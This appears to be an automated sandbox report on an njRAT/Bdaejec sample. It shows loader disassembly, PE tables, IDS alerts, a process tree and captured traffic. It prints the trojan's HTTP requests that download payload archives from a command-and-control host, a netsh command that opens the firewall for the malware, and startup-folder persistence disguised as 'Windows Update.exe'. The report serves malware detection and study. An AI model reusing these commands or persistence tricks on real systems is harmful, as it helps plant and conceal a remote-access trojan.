            mov dword ptr [ebp-20h], eax
            mov dword ptr [ebp-18h], eax
            mov dword ptr [ebp-48h], 79715252h
            mov dword ptr [ebp-44h], 652E5849h
            mov dword ptr [ebp-40h], 00006578h
            mov dword ptr [ebp-3Ch], 00000000h
            call 00007F69606275A5h
            pop eax
            add eax, 00000225h
            mov dword ptr [ebp-04h], eax
            mov eax, dword ptr fs:[00000030h]
            mov dword ptr [ebp-28h], eax
            mov eax, dword ptr [ebp-04h]
            mov dword ptr [eax], E904C483h
            mov eax, dword ptr [ebp-04h]
            mov dword ptr [eax+04h], FFFFDDE7h
            mov eax, dword ptr [ebp-28h]
            mov eax, dword ptr [eax+0Ch]
            mov eax, dword ptr [eax+1Ch]
            mov eax, dword ptr [eax]
            mov eax, dword ptr [eax+08h]
            mov ecx, dword ptr [eax+3Ch]
            mov ecx, dword ptr [ecx+eax+78h]
            add ecx, eax
            mov edi, dword ptr [ecx+1Ch]
            mov ebx, dword ptr [ecx+20h]
            mov esi, dword ptr [ecx+24h]
            mov ecx, dword ptr [ecx+18h]
            add esi, eax
            add edi, eax
            add ebx, eax
            xor edx, edx
            mov dword ptr [ebp-30h], esi
            mov dword ptr [ebp-1Ch], edx
            mov dword ptr [ebp-34h], ecx
            cmp edx, dword ptr [ebp-34h]
            jnc 00007F69606276EEh
            movzx ecx, word ptr [esi+edx*2]
            mov edx, dword ptr [ebx+edx*4]
            mov esi, dword ptr [edi+ecx*4]
            add edx, eax
            mov ecx, dword ptr [edx]
            add esi, eax
            cmp ecx, 4D746547h
            jne 00007F69606275F4h
            cmp dword ptr [edx+04h], 6C75646Fh
            jne 00007F69606275EBh
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x2b10200x210.data
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b10000xc.data
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            0x20000x180000x8600591649c120e289479abfcaccb7106825False0.9885144589552238data7.976487863015766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            0x1a0000x20000x2007b5d72e3b82ada6b0153f1874d37a8b2False0.052734375data0.28109187076190567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            0x1c0000x2920000x2e800a22c9aa11e7ff846b9c904a2e3dc3f19unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .data0x2ae0000xec0000xeb6004a74da4e1e72a696fc312542fb1b10a0False0.9859962078465215data7.970274705878334IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            du0x39a0000x60000x420022efc0e63d720655b3ebacf37c33d89bFalse0.7774621212121212data6.934584666735054IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            DLLImport
            kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
            user32.dllMessageBoxA
            advapi32.dllRegCloseKey
            oleaut32.dllSysFreeString
            gdi32.dllCreateFontA
            shell32.dllShellExecuteA
            version.dllGetFileVersionInfoA
            mscoree.dll_CorExeMain
            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
            2024-07-25T13:56:12.378551+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49723799192.168.2.644.221.84.105
            2024-07-25T13:55:53.012404+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49711799192.168.2.644.221.84.105
            2024-07-25T13:56:00.834389+0200TCP2028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update49716443192.168.2.620.42.65.92
            2024-07-25T13:56:15.343441+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49726799192.168.2.644.221.84.105
            2024-07-25T13:56:21.691262+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49729799192.168.2.644.221.84.105
            2024-07-25T13:56:26.240091+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49731799192.168.2.644.221.84.105
            2024-07-25T13:56:18.589198+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49728799192.168.2.644.221.84.105
            2024-07-25T13:55:52.186327+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup6472453192.168.2.61.1.1.1
            2024-07-25T13:56:46.196032+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973852.165.165.26192.168.2.6
            2024-07-25T13:55:56.754164+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49712799192.168.2.644.221.84.105
            2024-07-25T13:56:08.565178+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434972052.165.165.26192.168.2.6
            TimestampSource PortDest PortSource IPDest IP
            Jul 25, 2024 13:55:52.558504105 CEST49711799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:52.563390017 CEST7994971144.221.84.105192.168.2.6
            Jul 25, 2024 13:55:52.563488960 CEST49711799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:52.569232941 CEST49711799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:52.574099064 CEST7994971144.221.84.105192.168.2.6
            Jul 25, 2024 13:55:53.012348890 CEST7994971144.221.84.105192.168.2.6
            Jul 25, 2024 13:55:53.012403965 CEST49711799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:53.014391899 CEST7994971144.221.84.105192.168.2.6
            Jul 25, 2024 13:55:53.014436960 CEST49711799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:53.050890923 CEST49711799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:53.056250095 CEST7994971144.221.84.105192.168.2.6
            Jul 25, 2024 13:55:56.358400106 CEST49712799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:56.363395929 CEST7994971244.221.84.105192.168.2.6
            Jul 25, 2024 13:55:56.363491058 CEST49712799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:56.365510941 CEST49712799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:56.370559931 CEST7994971244.221.84.105192.168.2.6
            Jul 25, 2024 13:55:56.754077911 CEST7994971244.221.84.105192.168.2.6
            Jul 25, 2024 13:55:56.754163980 CEST49712799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:56.754252911 CEST7994971244.221.84.105192.168.2.6
            Jul 25, 2024 13:55:56.754297972 CEST49712799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:56.755501986 CEST49712799192.168.2.644.221.84.105
            Jul 25, 2024 13:55:56.760312080 CEST7994971244.221.84.105192.168.2.6
            Jul 25, 2024 13:56:10.902092934 CEST49723799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:11.942409992 CEST7994972344.221.84.105192.168.2.6
            Jul 25, 2024 13:56:11.942651987 CEST49723799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:11.994399071 CEST49723799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:11.999238014 CEST7994972344.221.84.105192.168.2.6
            Jul 25, 2024 13:56:12.378458023 CEST7994972344.221.84.105192.168.2.6
            Jul 25, 2024 13:56:12.378483057 CEST7994972344.221.84.105192.168.2.6
            Jul 25, 2024 13:56:12.378551006 CEST49723799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:12.378551006 CEST49723799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:12.380072117 CEST49723799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:12.385665894 CEST7994972344.221.84.105192.168.2.6
            Jul 25, 2024 13:56:14.931885958 CEST49726799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:14.936845064 CEST7994972644.221.84.105192.168.2.6
            Jul 25, 2024 13:56:14.940174103 CEST49726799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:14.940496922 CEST49726799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:14.946491003 CEST7994972644.221.84.105192.168.2.6
            Jul 25, 2024 13:56:15.343003988 CEST7994972644.221.84.105192.168.2.6
            Jul 25, 2024 13:56:15.343318939 CEST7994972644.221.84.105192.168.2.6
            Jul 25, 2024 13:56:15.343441010 CEST49726799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:15.351843119 CEST49726799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:15.358522892 CEST7994972644.221.84.105192.168.2.6
            Jul 25, 2024 13:56:18.179452896 CEST49728799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:18.184431076 CEST7994972844.221.84.105192.168.2.6
            Jul 25, 2024 13:56:18.184549093 CEST49728799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:18.189269066 CEST49728799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:18.194195032 CEST7994972844.221.84.105192.168.2.6
            Jul 25, 2024 13:56:18.588788986 CEST7994972844.221.84.105192.168.2.6
            Jul 25, 2024 13:56:18.589198112 CEST49728799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:18.589476109 CEST7994972844.221.84.105192.168.2.6
            Jul 25, 2024 13:56:18.589560986 CEST49728799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:18.593493938 CEST49728799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:18.599179983 CEST7994972844.221.84.105192.168.2.6
            Jul 25, 2024 13:56:21.290570021 CEST49729799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:21.295608044 CEST7994972944.221.84.105192.168.2.6
            Jul 25, 2024 13:56:21.295711040 CEST49729799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:21.295928001 CEST49729799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:21.300760984 CEST7994972944.221.84.105192.168.2.6
            Jul 25, 2024 13:56:21.691145897 CEST7994972944.221.84.105192.168.2.6
            Jul 25, 2024 13:56:21.691246033 CEST7994972944.221.84.105192.168.2.6
            Jul 25, 2024 13:56:21.691262007 CEST49729799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:21.691292048 CEST49729799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:21.735975027 CEST49729799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:21.741028070 CEST7994972944.221.84.105192.168.2.6
            Jul 25, 2024 13:56:25.799793005 CEST49731799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:25.804848909 CEST7994973144.221.84.105192.168.2.6
            Jul 25, 2024 13:56:25.804956913 CEST49731799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:25.806689978 CEST49731799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:25.812868118 CEST7994973144.221.84.105192.168.2.6
            Jul 25, 2024 13:56:26.239958048 CEST7994973144.221.84.105192.168.2.6
            Jul 25, 2024 13:56:26.240091085 CEST49731799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:26.243132114 CEST7994973144.221.84.105192.168.2.6
            Jul 25, 2024 13:56:26.243227005 CEST49731799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:26.245373011 CEST49731799192.168.2.644.221.84.105
            Jul 25, 2024 13:56:26.254625082 CEST7994973144.221.84.105192.168.2.6
            TimestampSource PortDest PortSource IPDest IP
            Jul 25, 2024 13:55:52.186326981 CEST6472453192.168.2.61.1.1.1
            Jul 25, 2024 13:55:52.373622894 CEST53647241.1.1.1192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jul 25, 2024 13:55:52.186326981 CEST192.168.2.61.1.1.10xaffdStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 25, 2024 13:55:52.373622894 CEST1.1.1.1192.168.2.60xaffdNo error (0)ddos.dnsnb8.net44.221.84.105A (IP address)IN (0x0001)false
            • ddos.dnsnb8.net:799
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.64971144.221.84.1057994888C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:55:52.569232941 CEST288OUTGET /cj//k1.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.64971244.221.84.1057994888C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:55:56.365510941 CEST288OUTGET /cj//k2.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.64972344.221.84.1057991216C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:56:11.994399071 CEST288OUTGET /cj//k1.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.64972644.221.84.1057991216C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:56:14.940496922 CEST288OUTGET /cj//k2.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.64972844.221.84.1057991216C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:56:18.189269066 CEST288OUTGET /cj//k3.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            5192.168.2.64972944.221.84.1057991216C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:56:21.295928001 CEST288OUTGET /cj//k4.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            6192.168.2.64973144.221.84.1057991216C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            TimestampBytes transferredDirectionData
            Jul 25, 2024 13:56:25.806689978 CEST288OUTGET /cj//k5.rar HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
            Host: ddos.dnsnb8.net:799
            Connection: Keep-Alive


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:07:55:50
            Start date:25/07/2024
            Path:C:\Users\user\Desktop\LisectAVT_2403002B_366.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_366.exe"
            Imagebase:0x600000
            File size:1'214'464 bytes
            MD5 hash:16AB569E9D84F0A2C9AACD47D4998D84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Borland Delphi
            Yara matches:
            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
            • Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:07:55:50
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            Imagebase:0xae0000
            File size:15'872 bytes
            MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:moderate
            Has exited:true

            Target ID:4
            Start time:07:55:53
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Local\Temp\server.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Local\Temp\server.exe"
            Imagebase:0x9a0000
            File size:1'214'464 bytes
            MD5 hash:16AB569E9D84F0A2C9AACD47D4998D84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Borland Delphi
            Yara matches:
            • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.4628547568.0000000003D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:low
            Has exited:false

            Target ID:5
            Start time:07:55:55
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\netsh.exe
            Wow64 process (32bit):true
            Commandline:netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\server.exe" "server.exe" ENABLE
            Imagebase:0xa60000
            File size:82'432 bytes
            MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:07:55:55
            Start date:25/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:07:55:56
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\WerFault.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
            Imagebase:0xb70000
            File size:483'680 bytes
            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:07:56:07
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
            Imagebase:0x9b0000
            File size:1'214'464 bytes
            MD5 hash:16AB569E9D84F0A2C9AACD47D4998D84
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:low
            Has exited:true

            Target ID:14
            Start time:07:56:09
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
            Imagebase:0x9b0000
            File size:1'214'464 bytes
            MD5 hash:16AB569E9D84F0A2C9AACD47D4998D84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:Borland Delphi
            Reputation:low
            Has exited:true

            Target ID:15
            Start time:07:56:09
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            Imagebase:0xa30000
            File size:15'872 bytes
            MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:18
            Start time:07:56:28
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
            Imagebase:0x1c0000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:19
            Start time:07:56:28
            Start date:25/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:21
            Start time:07:56:36
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe"
            Imagebase:0x930000
            File size:1'214'464 bytes
            MD5 hash:16AB569E9D84F0A2C9AACD47D4998D84
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:Borland Delphi
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            Reputation:low
            Has exited:true

            Target ID:22
            Start time:07:56:36
            Start date:25/07/2024
            Path:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RRqyIX.exe
            Imagebase:0x510000
            File size:15'872 bytes
            MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:23
            Start time:07:56:36
            Start date:25/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
            Imagebase:0x1c0000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:24
            Start time:07:56:36
            Start date:25/07/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff66e660000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:4.3%
              Dynamic/Decrypted Code Coverage:93.8%
              Signature Coverage:0%
              Total number of Nodes:32
              Total number of Limit Nodes:3
              execution_graph 17732 350aa12 17733 350aa67 17732->17733 17734 350aa3e SetErrorMode 17732->17734 17733->17734 17735 350aa53 17734->17735 17744 350b446 17747 350b46c ShellExecuteExW 17744->17747 17746 350b488 17747->17746 17748 350aaa6 17749 350aade CreateFileW 17748->17749 17751 350ab2d 17749->17751 17736 350a59a 17737 350a610 17736->17737 17738 350a5d8 DuplicateHandle 17736->17738 17737->17738 17739 350a5e6 17738->17739 17752 7a0540 17753 7a054d VirtualAlloc 17752->17753 17755 350b06a 17758 350b0a2 CreateMutexW 17755->17758 17757 350b0e5 17758->17757 17759 350ac6a 17760 350ac9f GetFileType 17759->17760 17762 350accc 17760->17762 17740 350a65e 17741 350a6c0 17740->17741 17742 350a68a OleInitialize 17740->17742 17741->17742 17743 350a698 17742->17743 17763 350a72e 17764 350a77e OleGetClipboard 17763->17764 17765 350a78c 17764->17765 17766 350aeae 17767 350aee3 WriteFile 17766->17767 17769 350af15 17767->17769

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 3624298-36242c9 2 3624352-362435a 0->2 3 36242cf-3624350 0->3 4 3624366-362437a 2->4 3->2 30 362435c 3->30 5 3624380-36243bc 4->5 6 362452f-362467d 4->6 17 36243be-36243e6 5->17 18 36243ed-36244ea 5->18 44 3624683-36247d2 6->44 45 362480d-3624821 6->45 17->18 134 36244ef 18->134 30->4 44->45 46 3624827-3624934 45->46 47 362496f-3624983 45->47 46->47 49 36249d6-36249ea 47->49 50 3624985-362499b call 3624210 47->50 54 3624a32-3624a46 49->54 55 36249ec-36249f7 49->55 50->49 59 3624b94-3624ba8 54->59 60 3624a4c-3624b59 54->60 55->54 62 3624cd4-3624ce8 59->62 63 3624bae-3624bc2 59->63 60->59 67 3624f74-3624f88 62->67 68 3624cee-3624f2d 62->68 71 3624bd0-3624be4 63->71 72 3624bc4-3624bcb 63->72 75 3624fe2-3624ff6 67->75 76 3624f8a-3624f9b 67->76 68->67 73 3624be6-3624bed 71->73 74 3624bef-3624c03 71->74 78 3624c48-3624c5c 72->78 73->78 80 3624c05-3624c0c 74->80 81 3624c0e-3624c22 74->81 84 3625045-3625059 75->84 85 3624ff8-3624ffe 75->85 76->75 87 3624c76-3624c82 78->87 88 3624c5e-3624c74 78->88 80->78 89 3624c24-3624c2b 81->89 90 3624c2d-3624c41 81->90 93 36250a2-36250b6 84->93 94 362505b 84->94 85->84 92 3624c8d 87->92 88->92 89->78 90->78 99 3624c43-3624c45 90->99 92->62 102 36250b8-36250e1 93->102 103 362512d-3625141 93->103 94->93 99->78 102->103 107 3625147-3625363 103->107 108 36253b4-36253c8 103->108 491 3625367 107->491 492 3625365 107->492 109 362549e-36254b2 108->109 110 36253ce-3625457 108->110 116 36254b8-3625628 109->116 117 362566f-3625683 109->117 110->109 116->117 126 36257e6-36257fa 117->126 127 3625689-362579f 117->127 130 3625800-3625916 126->130 131 362595d-3625971 126->131 127->126 130->131 138 3625977-3625a8d 131->138 139 3625ad4-3625ae8 131->139 134->6 138->139 144 3625c4b-3625c5f 139->144 145 3625aee-3625c04 139->145 151 3625dc2-3625dd6 144->151 152 3625c65-3625d7b 144->152 145->144 158 3625f39-3625f4d 151->158 159 3625ddc-3625ef2 151->159 152->151 164 3625f53-3626069 158->164 165 36260b0-36260c4 158->165 159->158 164->165 173 3626227-362623b 165->173 174 36260ca-36261e0 165->174 182 3626241-3626357 173->182 183 362639e-36263b2 173->183 174->173 182->183 197 3626536-362654a 183->197 198 36263b8-36263fd call 3624278 183->198 